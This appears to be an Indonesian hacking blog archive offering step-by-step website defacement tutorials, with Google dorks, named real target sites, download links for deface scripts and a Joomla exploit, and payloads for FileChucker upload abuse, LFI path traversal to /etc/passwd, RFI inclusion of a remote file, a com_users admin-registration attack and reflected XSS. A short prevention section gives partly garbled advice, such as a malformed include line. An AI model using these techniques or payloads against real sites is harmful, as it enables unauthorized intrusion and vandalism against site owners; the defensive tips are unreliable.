Tampilkan postingan dengan label Deface. Tampilkan semua postingan
Tampilkan postingan dengan label Deface. Tampilkan semua postingan

Kamis, 18 Juni 2015

Script Deface Website Sederhana Tapi Keren

Download >>>>>Download<<<<<
Script 1 (dengan lagu Indonesia Raya)
Original by Indonesian Security Tester
Modded by Dimzvers (Saya)
Screenshot




Script 2
Teks Berjalan, Warna Hijau
Original by (Indonesian Stealth Cyber Army)
Modded by (Saya)
Screenshot



Deface dengan metode Exploit FileChucker

FileChucker merupakan salah satu pluggin wordpress yang memiliki celah file upload. Defacer tanpa login dapat mengupload file ke website target dengan memanfaatkan celah pada plugin ini.
Dork yang dapat digunakan:
inurl:/cgi-bin/filechucker.cgi
intext:Toptown File Upload
inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable
Masukkan dorknya ke kotak pencarian google, maka target – target akan muncul seperti dibawah ini.


Saya memilih salah satu target yaitu http://www.bellblue.com/cgi-bin/filechucker.cgi
Lalu setelah dibuka isi semua form yang kosong (diisi asal-asalan juga tidak apa apa)


Lalu pada kolom pilih file, upload script deface anda yang berformat HTML atau txt


Lalu klik Begin Upload, jika upload sukses maka tampilan seperti ini


Untuk melihat filenya masukan URL http://site.com/upload/files/file_mu
Contoh : http://www.bellblue.com/upload/files/dimz.txt/
Bagi yg belum punya download punya saya Di Sini

-Dimzvers-

Tutorial Singkat LFI & RFI


Sebelumnya apa sih LFI dan RFI itu??


LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:


Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,

Code:
<?php
  include "../$_GET[imagefile]";
  ?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya
Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.


nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalaman folder tempat file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser. kita bisa menggunakan metode menebak struktur folder dalam website target hahahhh... "The..."

tapi seandainya terdapat error seperti di bawah ini:

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2
liat pada passwd ternyata dia ditambah dengan extensi ".php" berarti code yang digunakan untuk include adalah seperti ini
Code:
Code:

  <?php
  include($_GET[imagefile].".php");
  ?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,
Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tersebut.

-Dimzvers-

Deface Dengan Teknik com_user

Teknik com_users ini prinsip kerjanya adalah halaman yang digunakan untuk mendaftar sebagai admin pada situs joomla. Bug com_users banyak ditemukan pada joomla versi 1.6 dan 1.7.
Gunakan dork dibawah ini di google.
· inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:br
·         site:com inurl:Home Page Beez joomla 1.6 index.php using-joomla
·         inurl:index.php joomla! 1.7 - open source content management site:
·      inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com
·         intext:joomla! 1.7 - open source content management site:jp
·         inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:id
·         inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as
·         inurl:index.php/19-sample-data-articles/joomla site:com
Copy dork diatas dan paste di kotak pencarian di google. Cari targetnya sesuai hasil pencarian.
Misal disini saya memakai contoh website http://www.cognobase.com/cms/.
kita buka halaman administratornya untuk mengetahui situs tersebut apakah vuln atau tidak.
Kalau 2 garis dibawah situs saling berdekatan seperti dibawah ini, berarti vuln (memiliki celah com_users)

Sekarang download dulu exploit joomla disinihttp://www.mediafire.com/view/q1zdfkwlez84qwr/Exploit_Joomla.html


Explot: index.php?option=com_users&view=registration
Seperti dibawah ini site_target.com/ index.php?option=com_users&view=registration


Kemudian akan muncul halaman pendaftaran. Kebetulan itu website demonya pake bahasa apa ini gak jelas. Hehe, tapi intinya sama aja.
Setalah muncul halaman pendaftarannya, tekan CTRL + U.


Selanjutnya tekan CTRL + F (untuk mengaktifkan fitur find). Kemudian ketik hidden pada kotak pencarian, klik Next.

Maka hasilnya seperti dibawah ini.
Copy token dan urlnya seperti gambar dibawah ini.


Buka exploit joomla yang kita download tadi. Klik kanan, kemudian pilih Open With, lalu klik Notepad.


Paste URL dan token dari hasil CTRL + U tadi. Kemudian save.


Double klik Exploit Joomla.html yang tadi kita edit. Kemudian terlihat seperti gambar dibawah ini. Edit username, email, dan password sesuai keinginan kita. Lalu klik Register.

Nanti ada tulisan
“Your account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by clicking on the activation link when you receive the activation email.”

Sekarang buka email agan dan buka link konfirmasinya.
Setalah itu login ke halaman administrator tadi.

Maka hasilnya seperti ini.

Jika sudah masuk ke halaman admin, bebas deh mau diapain websitenya, klo mau deface index atau salah satu halaman web, pilih Article Manager nanti tinggal pilih salah satu artikel lalau ganti deh isinya dengan script Deface anda.
Bagi yg belum punya download punya saya Di Sini

-Dimzvers-

Cara Deface dengan teknik XSS

XSS atau kepanjangan dari Cross Site Scripting merupakan teknik Hacking Injeksi Code ( Code Injection Attack ), yaitu seorang attacker menginjeksi atau memasukan kode ke HTML atau JavaScript, DLL selanjutnya akan di eksekusi oleh client.

Dork: inurl:"/showcatrows.php?CategoryID="

Gunakan dork diatas untuk mencari target di google.
Contoh : http://2muchvector.com/showcatrows.php?CategoryID=41

Lalu tambahkan script HTML atau Javascript anda di akhir URL
Contoh <marquee><h1>This Site Has Been Hacked</h1></marquee> lalu tekan enter


-Dimzvers-